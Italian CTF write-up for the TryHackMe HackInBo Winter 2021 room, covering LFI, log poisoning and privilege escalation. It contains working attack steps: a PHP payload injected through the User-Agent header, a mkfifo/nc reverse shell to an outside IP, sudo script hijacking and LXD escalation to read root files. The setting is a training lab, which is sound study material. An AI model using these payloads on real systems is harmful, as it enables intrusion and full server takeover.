Appunti per la CTF HackInBo

https://tryhackme.com/room/hackinbowinter2021

nmap -sV -sC -A 10.10.25.22

```
OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
22/tcp open
              ssh
ssh-hostkey:
2048 f7:8b:44:d1:76:3c:87:f3:6c:41:83:22:b2:f3:8f:a9 (RSA)
256 b7:16:20:84:65:80:44:d4:58:d2:86:2c:e8:bf:bc:ca (ECDSA)
256 53:af:ef:ed:0b:cf:2e:dc:89:56:e8:8a:da:bd:cb:e2 (ED25519)
80/tcp open http
                        Apache httpd 2.4.29 ((Ubuntu))
| http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html).
aggiungiamo al file host il puntamento al vhost dev che troviamo nella home. Analizzando il portale
troviamo il path /menu/ che include dei file ?view=
vulnerabilità LFI
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,;/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,;/var/lib/misc:/usr/sbin/nologin
```

landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin

pollinate:x:109:1::/var/cache/pollinate:/bin/falsesshd:x:110:65534::/run/sshd:/usr/sbin/nologin

j0hn_do3:x:1001:1001:John,,,:/home/j0hn_do3:/bin/bash h4k1nb0:x:1000:1000:hacking bo:/home/h4k1nb0:/bin/bash

Usiamo i wrapper per leggere i file php

php://filter/convert.base64-

php://filter/convert.base64-

\$users = ['j0hn_d03' => 'P4\$\$w0RdS1Cur4'];

Testiamo ssh ma niente

Eseguiamo da LFI a RCE

Reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.164.169 8000 >/tmp/f

inseriamola nello user agent

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.164.169 8000 >/tmp/f');?> Gecko/20100101

Richiamiamo il file di apache access.log

Otteniamo la reverse shell

nc -nvlp 8000

listening on [any] 8000 ...

connect to [10.9.164.169] from (UNKNOWN) [10.10.251.69] 46420

/bin/sh: 0: can't access tty; job control turned off

\$

```
www-data@HackinBo2021:/home/j0hn_do3$ su j0hn_do3
su j0hn_do3
Password: P4$$w0RdS1Cur4
E siamo dentro come j0hn_do3
j0hn_do3@HackinBo2021:~$ sudo -l
sudo -l
[sudo] password for j0hn_do3: P4$$w0RdS1Cur4
Matching Defaults entries for j0hn_do3 on HackinBo2021:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/sbin\:/sbin\:/snap/bin
User j0hn_do3 may run the following commands on HackinBo2021:
  (h4k1nb0) /usr/bin/python3.6 /home/j0hn_do3/passwordgen.py
L'utente esegue il file python con i privilegi dell'utente h4k1nb0
Il file è nella home di j0hn_do3. Sostituiamo il file con uno contenente la reverse shell nostra
rm passwordgen.py && echo "import pty;pty.spawn('/bin/sh');" > passwordgen.py && sudo -u h4k1nb0
/usr/bin/python3.6 /home/j0hn_do3/passwordgen.py
$ id
id
uid=1000(h4k1nb0) gid=1000(h4k1ngb0)
groups=1000(h4k1ngb0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
nella cartella home troviamo il file .creds
cat .creds
I'm tired of forgetting it!!!!!!
P0w3r0V3rw3LM1ng
Privilege escalation.
l'utente fa parte del gruppo lxd.
```

\$ python3 -c "import pty;pty.spawn('/bin/bash');"

Sfruttiamo l'exploit seguendo

https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilegeescalation

```
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-
releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
# import the image
lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on
the victim machine, or it might fail.
# before running the image, start and configure the lxd storage pool as default
lxd init
# run the image
lxc init myimage mycontainer -c security.privileged=true
# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh
home # cd /mnt
/mnt # Is
root
/mnt # Is
root
/mnt # cd root
/mnt/root # Is
bin
          etc
                    lib
                              mnt
                                         run
                                                   swap.img
                                                                 var
boot
           home
                       lib64
                                  opt
                                             sbin
                                                                 vmlinuz
                                                       sys
                                                                        vmlinuz.old
cdrom
            initrd.img
                         lost+found
                                       proc
                                                             tmp
                                                  snap
dev
          initrd.img.old media
                                     root
                                                          usr
                                                srv
/mnt/root # cd root
/mnt/root/root # Is
root.txt
```